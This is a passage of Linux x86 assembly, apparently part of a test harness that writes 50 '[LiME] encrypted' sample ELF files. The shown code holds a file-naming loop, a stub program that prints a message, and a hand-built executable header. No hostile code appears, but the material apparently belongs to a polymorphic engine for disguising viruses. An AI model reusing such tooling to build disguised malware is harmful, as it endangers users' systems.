- inc byte [ebx+1]
- cmp byte [ebx+1],'9'
- jbe gen_l2
- inc byte [ebx]
- mov byte [ebx+1],'0'
- gen_l2:
- pop ecx
- loop gen_l1
- mov eax,1
- xor ebx,ebx
- int 80h
- gen_msg db 'Generates 50 [LiME] encrypted test files...',0dh,0ah
- gen_msg_len equ $-gen_msg
- host:
- call host_reloc
- host_reloc:
- pop ecx
- add ecx,host_msg-host_reloc
- mov eax,4
- mov ebx,1
- mov edx,host_msg_len
- int 80h
- mov eax,1
- xor ebx,ebx
- int 80h
- host_msg db 'This is a [LiME] test file! ...('
- filename db 't00',0
- db ')',0dh,0ah
- host_msg_len equ $-host_msg
- host_len equ $-host
- elf_head:
- e_ident db 7fh,'ELF',1,1,1
- times 9 db 0
- e_type dw 2
- e_mach dw 3
- e_ver dd 1
- e_entry dd host_entry-elf_head+08049000h
- e_phoff dd 34h
- e_shoff dd 0
- e_flags dd 0
- e_elfhs dw 34h
- e_phes dw 20h
- e_phec dw 01h
- e_shes dw 0
- e_shec dw 0
- e_shsn dw 0
- elf_ph:
- p_type dd 1
- p_off dd 0
- p_vaddr dd 08049000h
- p_paddr dd 08049000h
- p_filsz dd file_len
- p_memsz dd file_len
- p_flags dd 7
- p_align dd 1000h
- times 20h db 0
- host_entry:
- times 1024*4 db 0
- file_len equ $-elf_head
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